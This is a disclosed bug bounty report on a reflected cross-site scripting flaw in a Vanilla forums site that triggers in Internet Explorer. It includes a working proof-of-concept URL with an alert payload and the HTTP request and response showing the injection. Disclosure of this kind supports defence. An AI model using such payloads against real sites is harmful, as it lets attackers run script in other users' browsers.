ReportLink:https://hackerone.com/reports/386112
WeaknessName:Cross-site Scripting (XSS) - Reflected
Reporter:https://hackerone.com/bobrov
ReportedTo:Vanilla(vanilla)
BountyAmount:100.0
Severity:low
State:Closed
DateOfDisclosure:18.11.2018 7:07:02

Summary:

**Summary:**
Reflected XSS via Request-URI for Internet Explorer.

## Steps to reproduce:

1. Open URL in Internet Explorer (tested on IE 11)

```
https://blackfan.ru/x?r=https://allhiphop.vanillacommunities.com/xxx%22-alert(document.domain)-%22xxx/%252e%252e/
```
blackfan.ru/x - a simple redirection script that is needed to send a request-path without a urlencode.

**HTTP Request**
```http
GET /xxx"-alert(123)-"xxx/%2e%2e/ HTTP/1.1
Host: allhiphop.vanillacommunities.com
```

**HTTP Response**
```html
<script>
   COMSCORE.beacon({
      c1:2,
      c2:6685975,
      c3:"",
      c4:"app6.cl411.vanilladev.com/xxx"-alert(123)-"xxx/%2e%2e/",
      c5:"",
      c6:"",
      c15:""
   });
   </script>
```

## Impact

Reflected XSS